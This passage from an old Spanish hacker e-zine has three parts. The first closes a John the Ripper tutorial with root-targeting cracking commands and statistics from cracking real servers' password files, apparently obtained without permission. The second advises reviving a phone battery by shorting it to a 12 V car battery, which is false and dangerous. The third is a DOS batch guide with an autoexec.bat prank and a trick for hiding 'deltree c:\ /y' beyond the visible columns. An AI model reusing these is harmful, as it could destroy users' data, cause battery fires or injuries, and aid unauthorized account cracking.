  Si el passwd esta shadow entonces tenemos que conseguir el /etc/shadow
  pues al tenerlo tenemos que unir el shadow y el passwd para asi poder
  trabajar con el john, para eso esta el unshadow, se usa asi:

unshadow PASSWORD-FILE SHADOW-FILE

  y te mostrar  en pantalla el archivo unido, pero eso no nos sirve,
  tenemos que unirlo, entonces lo redireccionamos a otro archivo asi

unshadow PASSWORD-FILE SHADOW-FILE > nuevo-passwd

  y luego podemos usar el archivo nuevo-passwd normalmente, como hemos
  visto anteriormente.

  Al conseguir un password este es enviado a un archivo llamado john.pot
  y si hemos conseguido 2 passwords, no hay problema para saber cual es cual
  pero si tenemos mas de 1000 passwords la cosa se nos complica, para eso
  esta la opcion show, esta muestra los passwords crackeados, despues de
  haber crackeado algunos passwords ponemos esto.

john -show nuevo-passwd

  y pasa igual que con el shadow asi que lo hacemos asi

john -show nuevo-passwd > logins-passes

  y donde va el password encriptado, pondra el password ya crackeado

                                  Restore   
                                  ÍÍÍÍÍÍÍ   
             
  El restore es de mucha utilidad, sobre todo si estas crackeando passwords
  muy dif¡ciles de crackear que llevan dias, meses, a¤os, siglos (bueno aqui
  como que exagero un poco jeje) en crackear, ya que podemos parar cuando
  lo deseamos y continuar cuando queramos desde el mismo lugar donde paramos,
  ¨arrecho no? ;)
  Para usar el restore hacemos lo siguiente
  queremos crackear el password del root de la NASA ;)

john -i passwd-root

  paramos la ejecucion con CRTL C, y la resturamos asi

john -re

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
Nota: El john the ripper es muy flexible en cuanto a abreviaciones, como
por ejemplo el caso anterior, coloque, john -re que es igual a john -restore
tambien en el caso john -i passwd es igual a john -incremental:all passwd
john -wordfile:password.lst passwd es igual a john -w:passwd.lst passwd
john -i passwd -session:restore2 es igual a john -i passwd -se:restore2
john -single passwd es igual a john -si passwd etc, deben haber muchas
mas que no he colocado aqui, b£scalas y me avisas ;)
-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-

  Pero al parar una ejecuci¢n con CRTL C, el crea un archivo llamado restore
  en el cual estan los datos de como iba el crackeo al momento de ser
  interrumpido, y si por un descuido no hemos terminado de crackear ese
  password y ponemos al john the ripper a crackear otro pass, el borra ese
  restore y crea otro con la informacion del password que se esta crackeando,
  para evitar esto hacemos esto

john -i passwd-root -se:restore-root

y para restaurarlos solo pones

john -re:restore-root

y listo, problema solucionado

  Tambien podemos buscar passwords especificos, como por ejemplo alg£n tipo
  de shell, los que tengan privilegios 0:0 (root), etc,

john -w:password.lst -rules -users:0 passwd
john -w:password.lst -rules -group:0 passwd
john -w:password.lst -rules -shells:sh,csh,tcsh,bash passwd

puede haber muchas variaciones, lo podemos poner en modo incremental en
vez de poner con listas de palabras

john -i -users:0 passwd

en fin, hay mucha posiblidades

                               Estad¡sticas       
                               ÍÍÍÍÍÍÍÍÍÍÍÍ       

  Este texto no fue solamente escrito para quienes quieren violar la
  seguridad de un sistema, sino tambien para los administradores que
  quieran mantener su sistema fuera del alcance de un intruso,  mis
  recomendaciones personales son que deberian pasarle de vez en cuando
  el john the ripper a su sistema para asi saber quienes tienen passwords
  facilmente crackeables y obligarlos a cambiar estos passwords ya que
  por su inconciencia ponen en juego la seguridad del sistema, segun
  resultados REALES podemos ver lo siguiente:

        Host N§ 1

  En un servidor con 3916 cuentas fueron crackeados 1703 lo cual es un
  43.5%, de esos 1703 passwords en modo single fueron crackeados 970 lo
  que equivale a un 24.77% del total de passwords y un 57% del total de
  passwords crackeados, los otros 733 passwords fueron crackeados con
  listas de palabras, no fue usado el modo -rules ya que tardaria
  demasiado en terminar, debido a la gran cantidad de passwords, pero
  de seguro saldr¡an muchos mas, de estos passwords solo salieron 4 en
  modo incremtal:digits, claro, no lo deje terminar, por la misma raz¢n,
  pero revisando los passwords crackeados 51 (1.3%) passwords son el mismo
  login, ejemplo, login: pepe password: pepe lo que es un gran peligro
  para el sistema, algunos son ciudades o paises, caracas (11 veces),
  barinas, maturin, y otras palabras como cocacola, cracker, y nombres
  (de mujeres y de hombres) entre otros, ¨que haria una buena pol¡tica
  con respecto a los passwords? veamos el proximo ejemplo...

        Host N§ 2

  En un host con una pol¡tica en la escojencia de los passwords muy buena,
  seg£n dicen por ahi, hay una carta que te leen al momento de darte una
  cuenta en el servidor en la cual comentan la importancia de tener un
  password seguro, no solo para tu seguridad, sino la seguridad del
  sistema, ha dado resultados pero siempre hay gente que no le para,
  aqui hay 1359 cuentas y se nota que si funciono un poco la politica
  de esta empresa, en modo single crackea solo 17 passwords, lo cual
  viene siendo el 1.25%, comparado con el 24.77% del ejemplo anterior
  se nota bastante la diferencia, y con listas de palabras fueron
  crackeados hasta 40 passwords, lo que seria un 3%, que no se acerca
  ni remotamente al 43.5% anteriormente visto, de estos 17 solo en 3
  casos el login y el password era el mismo, lo que seria un 0.22%
  tambien aqui gana este servidor, en contra del 1.3% del servidor
  anterior, concluyendo, es muy importante una buena pol¡tica para la
  escojencia de passwords pero no es 100% segura, a ver... creo que tengo
  otros passwd por aca, veamos...

        Host N§ 3

  Aja, aqui est , analicemos esta situaci n, bueno este host me cay¢ bien,
  sin duda el administrador esta aprendiendo unix por correspondencia,
  parece que ya sabe usar el finger, jeje, si, la verdad, se ve bastante
  de esto si buscas bien, administradores que cobran sin trabajar, bueno,
  sigamos aqui hay 401 cuentas, de las cuales en modo single fueron
  crackeados 143 passwords 35.66%, no parece alarmante en comparaci¢n
  con el primer host evaluado pero si analizamos un poco... veamos, de
  los 143 passwords crackeados 71 son el mismo login, ¨increible no? un
  17.7% wow, que newbies no? seguimos comparando?? pues en el primer host
  esta misma cifra era un 1.3%, en el segundo un 0.22% y aqui un GRAN
  17.7%, osea se podr n imaginar que puede pasar en este caso }:->

  Algo que casi se me olvidaba es que siempre salen bastantes passwords
  de  este  estilo, por  ejemplo, login  cuaima y  password  cuaima98 o
  cuaima97 o 99 esto es muy importante a la hora de hacer un ataque de
  fuerza bruta, en este host hubo 31 passwords de este tipo.

                           Recomendaciones Finales      
                           ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ      

  Tengo otros /etc/passwd por ahi pero no quiero inundar esto de n£meros
  aunque me parece muy importante ver cuales son las debilidades en cuanto
  a los passwords usados por los usuarios comunes, mi recomendaci¢n para los
  administradores es ademas de la pol¡tica de passwords como en el ejemplo
  numero 2, seria como dije arriba, pasarle a su sistema el john the ripper
  por lo menos una vez por semana y avisarle a los usuarios sobre sus
  passwords y que deben cambiarlos ya que ponen en peligro el sistema, y
  si  ellos no lo  hacen lo hace  el mismo  administrador  y le envias el
  password  antes  de cambiarlo porsupuesto,  pero esto  se debe  hacer
  inmediatamente, ya que si alguien ya entro a el sistema que manejamos
  quizas  ya tenga  el /etc/passwd  y cambiar  todos los  passwords en un
  sistema de 3000 usuarios es mas dificil ¨no? un saludo, nos vemos por ahi.

   ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÍÍ͹  Como arreglar las baterias de lo celulares  ÌÍÍÍÍÍÍÍÍÍÍÍÍÍ͹KaDiLaCÌÍÍÍÍ
   ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
           

  Te ha pasado ke cuando pasa alg£n tiempo con tu celular, se te
  descarga mucho la bateria (asi sea de las horas ke sea), y la cargas
  y se descarga a las 2 o 3 horas, y lo  ke te provoca es botarla a la
  basura, bueno no lo hagas y has esto sin miedo.

  En realidad lo ke pasa con las baterias es ke la gente tiene la mala
  costumbre de ke cuando llega a su casa pone a cargar la bateria sin ke
  ‚ste se haya descargado por completo, y al hacer esto por mucho tiempo
  llega una forma en ke la bateria solo dura un tiempo muy corto como el
  antes mencionado

  Pero ¨ke pasa alli?, ¨por ke sucede esto?, bueno la k¡mica de la
  bateria actua de  una forma ke cada vez ke cargas el celular desde
  cualkier punto, la bateria va a funcionas desde el punto en el ke la
  pusistes a cargar, formando asi una capa en el fondo (claro al
  principio no lo vemos o no lo persivimos pero a las pocas semanas
  te pasar  y lo ke te provocar  es recordarle la madre del ke te vendi¢
  la bateria de XXXX horas XDDDDD),

  Aki necesitaras una bateria de carros, dos cables y por supuesto la
  bateria del celular

  Si sacas la bateria del celular podras ver (en el lado de conexi¢n de
  la bateria con el celular) ke tiene tres conectores, uno ke dice +
  otro ke no dice nada (es el conector de tierra) y otro -, conecta,
  el positivo  de la bateria de carros con el + de la bateria del
  celular, y el negativo de la bateria de carros con el - de la bateria
  del celular por unos cortos segundos, hasta ke se caliente un poco el
  chip ke tiene internamente la bateria del celular, cuando ‚ste e haya
  calentado despegas lo cables, lo dejas ke se enfrie y lo pones a
  cargar de nuevo.


  Bateria 
del celular

/-------\
|       | 
|     @ |                       @: Chip interno del celular
|       |                       #: Conectores
|       |
| + -   |
| ###   |
| | |   |
\-|-|---/
  | |
  | |                cable -
  | \---------------------------------\
  |                                   |
  \-------------------------\         |
                            |         |
                            |         |
                            #+        #-  
                        /------------------\
                        |                  | 
                        |     Bateria      |
                        |    de carros     |
                        |       12 V       |
                        |                  |                                                          \------------------/                                                                                                                                                                                              
                        \------------------/

                            RECOMENDACIONES

  De recomendaciones te puedo decir es ke descarges tu celular antes de
  ponerlo a cargar, si ves ke tienes poca bateria pero todavia te keda,
  aprieta todos los botones tantas veces hasta ke se descarge tu bateria,
  pero si esto te da ladilla bueno comprate un cargador inteligente, ke
  tiene la opcion de descarga de baterias...


  bueno hasta aki todo por hoy espero ke les sirva de utilidad.......
  bueno bye...
  q=o)

        KaDiLaC
        
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

   ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÍÍ͹  Guia de Programaci¢n Batch  ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹MHVSSÌÍÍÍÍ
   ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ


                        Elaboraci¢n de archivos .bat
               Por Max Hedroom el Vampiro Sociedad Sangrienta
               ----------------------------------------------    

  Conceptos b sicos 1
  ~~~~~~~~~~~~~~~~~~~
    Como todos sabemos (y si no os lo digo ahora), los archivos .BAT
  o  archivos  batch  o  de  procesamiento por lotes  son un tipo de
  archivos  ejecutables (junto  con los .EXE y .COM)  en  los cuales
  se escribe  en cada  linea una orden  o comando de MS-DOS o una de
  las ordenes especiales del propio  lenguaje de programaci¢n batch.
  Respecto a los requerimientos  para poder  hacer archivos .BAT son
  simplemente  un ordenador (que  funcione claro :)  y  el  conocido
  programa "edit.com" que en el caso de que tengamos Windoze funciona
  por si mismo pero si s¢lo tenemos el DOS, el edit necesita del archivo
  "qbasic.exe" (que se usa para progrmar en Basic (que no VBasic) para
  funcionar que junto con el edit viene con el DOS.

  Ejemplo: As¡, si teniendo DOS querr¡amos por ejemplo hacer un archivo
  llamado "j.bat" que  nos  ahorrara  el trabajo  de tener que escribir
  ciertos  comandos para entrar  al juego "Pcfutbol  4.0"  (comentarios
  aparte,  es  solo  un  programa  ejemplo)  que  tenemos  guardado  en
  "C:\JUEGOS\DEPORTES\FUTBOL4"  y  cuyo  archivo para  jugar  es
  "futbol4.exe" har¡amos esto:

        1- Ejecutamos "edit j.bat"
        2- Escribimos: 
                en la 1¦ linea "c:"
                en la 2¦ "cd juegos\deportes\futbol4"
                en la 3¦ "futbol4" 
        3- Guardamos el archivo y salimos del edit (aunque si no habiamos 
  guardado al salir nos preguntara si queremos hacerlo)

    Asi, al escribir desde  cualquier  sitio  la ruta del archivo "j.bat"
  (por supuesto si el  archivo j.bat se encuentra  en el directorio en el
  que nos encontramos actualmente o en el PATH no habra que poner su ruta
  sino solo "j") y su propio nombre ("j") entrar¡amos al citado juego de
  futbol.

  Conceptos b sicos 2
  ~~~~~~~~~~~~~~~~~~~
    Si queremos hacer que un archivo .BAT escriba algo en la pantalla del
  ordenador pondremos "echo" y a continuaci¢n un espacio y el mensaje que 
  queramos que aparezca  (el comando echo tambien funciona desde la linea
  de comandos (o shell) pero es un poco tonto utilizarlo :). Pero al hacer
  un archivo .BAT con la linea "echo Hola HVs, esto es un archivo .BAT" en 
  pantalla nos aparecer¡a (suponiendo que estemos en la unidad C): 

"               C:\>echo Hola HVs, esto es un archivo .BAT
                Hola HVs, esto es un archivo .BAT                       "

    Para evitar que aparezcan en pantalla las ¢rdenes que  ponemos  en  el
  archivo.BAT y as¡ s¢lo aparezcan los resultados de estas  ¢rdenes, basta
  con poner justo en la linea anterior a las ¢rdenes que no queramos que se
  vean "@echo off". Adem s, para que, si en una linea anterior hemos puesto
  "@echo off" y ya no queremos que las pr¢ximas ¢rdenes se sigan sin ver
  pondremos "@echo on".

  Otra forma de hacer esto  mismo ser¡a poner una arroba ("@") delante de
  cada una de las  ¢rdenes que deseamos  que no se vean  y ya  est . Como
  pod‚is suponer la arroba que hay en las ¢rdenes "@echo off" y "@echo on"
  es para que estas  ¢rdenes  no  se vean por pantalla. De este modo, si
  quisieramos que al  ejecutar el  archivo anterior quisieramos que s¢lo
  se viera la £ltima orden ("futbol4")

  camb¡ariamos el archivo anterior por ‚ste:

"                       @echo off
                        c: 
                        cd juegos\deportes\futbol4
                        @echo on
                        futbol4                                        "

  o tambien podr¡amos poner:

"                       @c:
                        @cd juegos\deportes\futbol4
                        futbol4                                         "

  Otra cosa que podemos hacer es a¤adir un comentario cuya utilidad sea
  s¢lo la de aclarar al programador para que sirven ciertas ordenes, es
  decir que no aparezca por pantalla ni haga ning£n efecto y que as¡ tan
  s¢lo  aparezca  en  el  programa,  a modo  de  comentario  para que el
  programador entienda en un futuro (si revisa el archivo) que hacen las
  proximas instrucciones.  El comando para  hacer  esto  es  "rem".  As¡
  podr¡amos  a¤adir  a nuestro  archivo antes de todas las instrucciones
  "rem Este programa sirve para jugar al Pcfutbol 4.0".


  IF (Condici¢n)
  ~~~~~~~~~~~~~~
    Esta instrucci¢n sirve  para  establecer  una condici¢n de igualdad o 
  desigualdad,  lo que se hace de esta  manera: IF "termino1"=="termino2"
  acci¢n, donde accion es el comando a ejecutar si la condici¢n se cumple.
  Hay casos en  los que  las comillas no  son necesarias, pero para evitar
  errores es  conveniente  acostumbrarse  a  utilizarlas  siempre.  Ademas
  existe la particula NOT cuya utilidad  es la de hacer  que la acci¢n  se
  ejecute cuando no se cumpla la condici¢n. La utilizariamos asi:
  IF NOT "termino1"=="termino2" accion.

  GOTO (ir a)
  ~~~~~~~~~~~
    Esta instrucci¢n se utiliza para realizar un salto de una linea de un 
  programa a  otra que este  mas adelante  o mas atras... Para utilizarlo
  pondremos GOTO etiqueta  (tambi‚n se  puede  poner GOTO :etiqueta, pero
  aqui los ":" no son  necesarios), siendo "etiqueta" el nombre de cierta
  linea que deberemos llamar con ese nombre poniendo en ella ":etiqueta".
  Los  nombres  de  las  etiquetas pueden  ser  cualquier  combinaci¢n de
  caracteres  (excepto %n siendo n un  numero  cualquiera o "<" o ">". Ya
  veremos  mas  adelante  porque).  Si  bien,  el  lenguaje  BATCH,  para
  identificar las etiquetas solo atiende a los 8 primeros  caracteres, de
  forma que, por  ejemplo, las  etiquetas "12345678a" y  "12345678b"  son
  consideradas  iguales y el programa "ira" a la que este escrita primero
  en el programa. Asmismo, tampoco se haran distinciones entre mayusculas
  y  minusculas, de modo  que "AB" es  lo mismo que  "ab".  Si  bien,  la
  instrucci¢n GOTO se puede utilizar en si misma, normalmente se aplica a
  la realizaci¢n de  bucles  (repeticiones de  instrucciones hasta que se
  cumpla una condici¢n) o en estructuras de tipo
  IF "termino1"=="termino2" GOTO etiqueta.

De esta forma podriamos hacer este programa:
"                        @ECHO off
                         :pendejo
                         ECHO Eres un pendejo
                         goto pendejo                            "

    Como os podeis imaginar este programa hace un bucle sin fin (es decir,
  las acciones del bucle se repiten  sin cesar)  hasta que pulsemos Ctrl+C 
  (combinacion  de  teclas  que  sirve  para interrumpir cualquier archivo
  .BAT) o reiniciemos el ordenador. ;D
  Asimismo,  hay  que  tener  en  cuenta  que  las  instrucciones  se  van
  ejecutando linea a linea  (las  etiquetas  al  ejecutarlas  no  producen
  ningun efecto) de modo que para ejecutar cierto "trozo" del programa sin
  que se  ejecute  lo  siguiente deberemos utilizar el GOTO para mandar al
  programa  que  acuda  a  la  linea  que corresponda. Asi si hacemos este
  programa:

"                @ECHO off
                 echo Esto si tiene que salir

                 echo Esto no tiene que salir                   "

  Las dos frases seran escritas, mientras que en este no:
"                @ECHO off
                 echo Esto si tiene que salir
                 goto fin

                 echo Esto no tiene que salir                   
                 :fin                                           "

  Letras de colores
  ~~~~~~~~~~~~~~~~~
    Si!, en lenguaje BATCH podemos utilizar letras de colores. Para ello,
  nos  valdremos  de  el  comando  del DOS llamado PROMPT (que sirve para
  determinar  lo que nos aparece en el shell o interprete de comandos del
  DOS y que  normalmente  es  "C:\directorio_actual\>")  (el  prompt  del
  sistema es precisamente el nombre que  se le da a  lo  que  aparece  en
  nuestro  shell  o  interprete  de  comandos).  El PROMPT  es un comando
  interesante  pues  con  el podremos  moldear un poco la presentaci¢n de
  nuestro MS-DOS.  Podemos  hacer  que  en  vez de "C:\>" nos escriba por
  ejemplo  la fecha, la hora y un texto que nosotros le digamos en cierto
  color en  una linea  y en la siguiente "C:\>". Esto se haria ejecutando
  en  el  interprete  de  comandos  la  siguiente instrucci¢n: "prompt $d
  $t$e[35m Hola, que tal?$e[0m$_$p$g",  con  lo  que  a  partir  de ahora
  (hasta  que  cambiemos  de  nuevo el prompt del sistema) en la pantalla
  nos  aparecera  la  fecha  ($d),  seguido  de la hora ($t), seguido del
  mensaje "Hola, que tal?" en color violeta  ($e[35m) y por £ltimo, en la
  siguiente linea (el salto de linea lo hacemos  con $_) "C:\>" (en color
  normal gracias a $e[0m ). La lista de colores y todo lo relacionado con
  el comando PROMPT lo podeis  ver teclando en el  interprete de comandos
  "help prompt" (para que  funcione  la ayuda  debeis  tener los archivos
  qbasic.exe, help.com y help.hlp. En Ventanucos 9x no  es  necesario  el
  archivo  qbasic.exe, pero tendreis que conseguir  el  archivo  help.hlp
  pues  no  esta (estratagema  de Microsith  para que la gente no aprenda
  MS-DOS y solo sepa utilizar (a duras penas)  Ventanucos 9x que atonta a
  la gente...). Tambien  podremos ver algo  (pero no la lista de colores)
  escribiendo "prompt /?".

    Para  utilizar  letras  de  colores  en archivos .BAT utilizaremos el
  caracter $e. El caracter $e para el PROMPT representa  el  caracter ESC
  que para ECHO es el caracter "" (se que habia una forma  de  generarlo
  sin necesidad de un programa en pascal pero  ahora  no recuerdo como se
  generaba de modo que os envio  adjunto un  archivo  llamado esc.exe que
  sirve  para escribir en  pantalla  el caracter "". El codigo fuente de
  dicho es programa es:

"                       begin
                             write(chr(27));
                        end.                                    "

  Quien quiera le puedo  pasar el  compilador de pascal  (75.000  bytes).
  Para   escribir  el  caracter  en  un  archivo  deberemos  utilizar  un
  redireccionamiento  (lo que veremos mas adelante) de este modo: "esc >>
  archivo" siendo "archivo" el archivo donde queremos que nos aparezca el
  caracter  ""  al  final  (es  decir, el  caracter  nos aparecer  justo
  despues  de  lo ultimo  que  tengamos escrito en  el  archivo)  y  solo
  tendremos que cortarlo y pegarlo donde queramos. La raz¢n po la cual no
  se puede generar el caracter de forma normal en el DOS pues al intentar
  escribirlo  pulsando  Alt+27  (el n§  que  le  corresponde en el codigo
  ASCII) el ordenador  cree  que realmente estamos pulsando la tecla ESC.
  Bien, ahora que ya sabemos esto, os puedo decir cual es la  instrucci¢n
  en cuesti¢n para escribir letras de colores en la pantalla con archivos
  .BAT. Deberemos poner, en  una linea sola,  "ECHO  m", siendo "N" el
  n£mero  del  color  que  queremos y "m" una letra obligatoria (Como  he
  dicho  antes,  para  ver  los n£meros que corresponden a cada color los
  podemos  encontrar en la ayuda del DOS acerca del PROMPT mediante "help
  prompt").  Esa  orden  hace  que  todo  lo que escriban en pantalla las
  instrucciones  de todas las lineas posteriores a ella aparezca en color
  N (hasta que  se  cambie  de  nuevo  de color). Podemos, asi poner unas
  linea de un color y otras de otro. Para  poner  el color normal del DOS
  (blanco normal (tambien hay  blanco  brillante))  utilizaremos la orden
  "ECHO " que quita todos los atributos de color seleccionados (puede
  haber varios a la vez. Por ejemplo para poner la letra de color violeta 
  intermitente  deberemos  escribir  en  un  linea  "ECHO "  y en la
  siguiente "ECHO " o viceversa).

  Vamos a gastar una bromita...
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Esta broma, por supuesto  solo podremos gastarsela a alguien con poca
  idea  de  informatica...  Hagamos  un  archivo  que  primero tenga unas
  instrucciones  para  descomprimir  un juego (y adjunto tenga el archivo
  comprimido del juego) y que  despues  tenga  las  lineas  que  vienen a
  continuacion (el archivo se llamara juego.bat):

"@echo off
 rem LAS PROXIMAS DOS LINEAS DEBEN IR ESCRITAS EN UNA SOLA. 

 ECHO prompt APAGA EL ORDENADOR SI NO QUIERES QUE BORRE TODOS 
 TUS ARCHIVOS! >> c:\autoexec.bat 
 del juego.bat                                                          "

  Como veremos mas adelante ">>" sirve para que  el texto que esta  entre
  "ECHO"  y ">>" se escriba en la ultima linea del archivo que va despues
  de ">>". Asi, al  ejecutar  este  archivo  en  un  ordenador,  este, se
  borrara  a  si  mismo y escribira en el autoexec.bat una linea que hara
  que la proxima vez que el due¤o del ordenador en el que se ejecute este
  archivo encienda  su ordenador  le aparecera el mensaje en cuesti¢n, en
  vez del usual "C:\>".

  Un truco
  ~~~~~~~~
    En un archivo .BAT, podemos  poner las ordenes mas a la derecha de la
  parte visible de la pantalla de  forma que si alguien edita el archivo,
  no se de  cuenta de que  se van a  ejecutar esas instrucciones. Asi por
  ejemplo  podriamos  poner la  orden "deltree c:\ /y" (que borra todo el
  disco duro sin pedir confirmaci¢n)  a la derecha de dicha parte visible
  es decir, aqui ------------> deltree c:\ /y Incluso  podemos  poner que
  Incluso podemos poner que una orden empiece en la columna n§ 200, asi ------->                                                                                                                         deltree c:\ /y
  El n£mero de columnas que tiene un archivo es 255, de modo que  podemos 
  escribir una orden en la columna 256 - Numero de caracteres de la orden.

  Variables
  ~~~~~~~~~
    En el lenguaje BATCH como en cualquier otro lenguaje de  programacion
  existen variables, si bien estan muy limitadas. Estas variables son las
  que se pueden poner como parametros a un archivo. Por ejemplo, nosotros,
  al escribir en el interprete de comandos o shell del MS-DOS
  "dir c:\*.bat /p /s" estaremos suministrandole al archivo DIR tres
  parametros: "c:\*.bat", "/p" y "/s". Dichos parametros podian haber
  sido cualesquiera otros. Asi el lenguaje de programacion BATCH tiene
  predefinidas unas variables cuya utilidad es la de almacenar cada uno
  de los parametros que se suministren a un archivo incluyendo el propio
  nombre del archivo, que seran:

        %0 -------> Nombre del archivo ejecutado.
        %1 -------> Primer parametro suministrado al archivo.
        %2 -------> 2ø parametro suministrado.
        %3 -------> 3ø parametro suministrado.
        %4, %5, %6, %7, %8 y %9 -------> 4ø, 5ø, 6ø, 7ø, 8ø y 9ø

  Es necesario saber que si queremos escribir tal cual en la pantalla  (o
  en otro archivo) "%1", "%2", "%3"... deberemos escribir en nuestro
  archivo "%%1", "%%2", "%%3"... Se da por supuesto que no se puede
  introducir el parametro 2 sin introducir el primero por lo que si
  deseamos comprobar si se han escrito 3 parametros bastara con comprobar
  si se ha introducido el 3ø. Ahi va un ejemplo (este archivo debera
  llamarse "prueba.bat"):

"                       @ECHO OFF
                        IF "%1"=="" GOTO ayuda
                        IF NOT %0==prueba IF NOT %0==prueba.bat GOTO mensaje
                        type %1 |more
                        ECHO Pruebe a cambiar de nombre este archivo y ejecutelo.
                        
                        :mensaje
                        ECHO.
                        ECHO El nombre del archivo ha sido modificado.
                        ECHO Su nombre debe ser "prueba" y no %0.
                        ECHO Y su extension debe de ser siempre ".bat".
                        goto fin

                        :ayuda
                        ECHO.
                        ECHO Este programa sirve para ver un archivo por pantalla.
                        ECHO Debe de especificar el archivo a mostrar por pantalla.
                        ECHO %0 ""
                        :fin                                        "

  Es  destacable   que  en  la  anteultima  linea  ("ECHO %0 """) utilicemos comillas para encerrar los signos "<" y ">"
  debido a que se producirian errores al confundirlos con los signos de
  redireccionamiento de los que hablaremos ahora...

  Redireccionamientos
  ~~~~~~~~~~~~~~~~~~~
  Los   redireccionamientos  consisten  en   transmitir  el  resultado  o
  contenido de un archivo (que normalmente se muestra por pantalla) a
  otro que lo almacene o use. Los signos utilizado para realizar
  redireccionamientos son ">" y ">>". El primero (">") sirve para
  escribir en un archivo el resultado de la operacion que le precede. De
  esta forma podemos, por ejemplo, enviar el resultado del comando  "dir"
  al archivo dir.txt: "dir > dir.txt". Lo que hubiera antes en el archivo
  dir.txt sera borrado automaticamente y si dicho archivo no existiera,
  seria creado. Y el segundo (">>") funciona igual que ">" con la
  diferencia de que no borra el contenido del archivo si este ya
  existiera, sino que a¤ade lo que le digamos a partir de la ultima linea
  del archivo. 
  Hay que tener cuidado  cuando escribimos  estos signos puesto que puede
  que  solo queramos hacer que aparezcan en pantalla y no queramos  hacer
  un  redireccionamiento. Por ello es necesario poner entre  comillas los
  mensajes  que mostremos con ECHO que contengan alguno de esos signos  o
  incluso el signo "<" que para algunos comandos en especial, tiene
  utilidad (que yo sepa solo el MORE), como el MORE con el que podremos
  ver un archivo pantalla por pantalla como si utilizaramos "TYPE
  archivo_a_visualizar | more" escribiendo simplemente "MORE <
  archivo_a_visualizar".

  SHIFT (Desplazar)
  ~~~~~~~~~~~~~~~~~
    La  orden  SHIFT  tiene  por objeto  permitir  que se usen  mas de  9
  parametros en programas que asi lo necesiten. Para ello, SHIFT deplaza
  una posicion hacia la izquierda cada una de las variables. Por tanto si
  por ejemplo, ejecutamos "dir /p /w /s /aa /ah /oe /b /l /ch *.*"
  tendriamos:
        
        ANTES DE EJECUTAR       |       DESPUES DE EJECUTAR
           SHIFT 1 VEZ          |           SHIFT 1 VEZ
-----------------------------------------------------------------------------
%0            dir                               /p 
%1            /p                                /w
%2            /w                                /s
%3            /s                                /aa
%4            /aa                               /ah
%5            /ah                               /oe
%6            /oe                               /b
%7            /b                                /l
%8            /l                                /ch
%9            /ch                               *.*

Para ejecutar SHIFT simplemente pondremos en una linea "SHIFT".

  CALL (Llamar)
  ~~~~~~~~~~~~~
    La utilidad de CALL es permitir ejecutar un programa .BAT desde  otro
  para luego volver a ese "otro" programa .BAT y continuar ejecutando
  sus instrucciones. Para ello simplemente pondremos en una linea:

CALL archivo.bat

  FOR (Durante)
  ~~~~~~~~~~~~~
    Este  comando sirve para realizar una accion sobre varios archivos  a
    la vez (uno despues de otro). La sintaxis utilizada es:

"FOR %%Variable IN (Conjunto) DO Mandato %%Variable"

  Donde  "%%Variable"  es una variable de una letra (3 contando  los  dos
  "%"), "(conjunto)" es el grupo de archivos  sobre los que  queremos que
  se realice la accion (dicho  grupo debe ir siempre entre  parentesis) y
  "Mandato"   es  la  accion  a  realizar.  Para  utilizar  este  comando
  directamente desde MS-DOS, en vez de dos utilizaremos solo un signo de
  "%" para representar la variable. La letra de "Variable" no puede ser
  un numero pues se confundiria con las variables (%1, %2,... antes
  nombradas). No he considerado "%%Variable" como una verdadera variable
  porque solo la usa el comando FOR y porque su valor no es introducido
  por el usuario, sino por el propio programa.
    Este comando solo ejecuta una orden (sobre varios archivos  pero  una
  orden), de modo que si queremos ejecutar varias ordenes sobre los
  mismos archivos deberemos poner la misma linea dos veces con el mandato
  que corresponda en cada caso. Por ejemplo, podeis ver un util ejemplo
  que sirve para ver el contenido de varios archivos 1 por 1 y pagina a
  pagina y que muestro y explico a continuacion:

Haremos en Pascal este archivo (mipausa.pas):

USES 
    crt;
BEGIN
     readkey;
END.

Lo compilaremos obteniendo asi el mipausa.exe.
Ahora haremos este archivo (my.bat):

cls
ECHO 
ECHO                                    %1
ECHO 
mipausa
type %1 |more
mipausa

Y ahora haremos este archivo (mytype.bat):

@ECHO OFF 
IF "%1"=="" GOTO ayuda
FOR %%a IN (%1 %2 %3 %4 %5 %6 %7 %8 %9) DO CALL my %%a
GOTO fin

:ayuda
ECHO. 
ECHO Sintaxis:
ECHO.
ECHO    "MYTYPE "
ECHO Se admiten caracteres comodin

:fin

  Nota:  Es  posible colocarlos en algun directorio que este en el PATH o
  cambiar la linea del autoexec.bat en la que pone "PATH..." a¤adiendo un
  ";" y a continuacion el nombre del directorio en el que pongamos  estos
  3  archivos  (si no estaba ya), con  lo que conseguiremos que se  pueda
  ejecutar  el  mytype  desde  cualquier  sitio. Tambien se puede cambiar
  mipausa por el  pause del  DOS  pero esto hara aparecer el antiestetico
  mensaje del DOS "Pulsa una tecla para continuar...".

  Ahora podremos ver  multiples archivos pagina por pagina... Incluyo los
  3 archivos (el mipausa ya compilado). Quien lo desee le puedo mandar el
  archivo para compilar programas de pascal.

  CHOICE (Elegir opciones)
  ~~~~~~~~~~~~~~~~~~~~~~~~
    A  un  programa  .BAT no le es posible pedir que escribas tu nombre y
  leerlo  pero  si puede darte opciones a diferentes nombres pre-escritos
  en el programa .BAT y pedirte que le  escribas una letra que se te haya
  informado que este asociada a ese nombre. La sintaxis de CHOICE es: 
  "CHOICE /cLista-opciones MENSAJE" siendo "Lista-opciones" las letras
  asociadas a las opciones que notificaremos antes con ECHO o en el
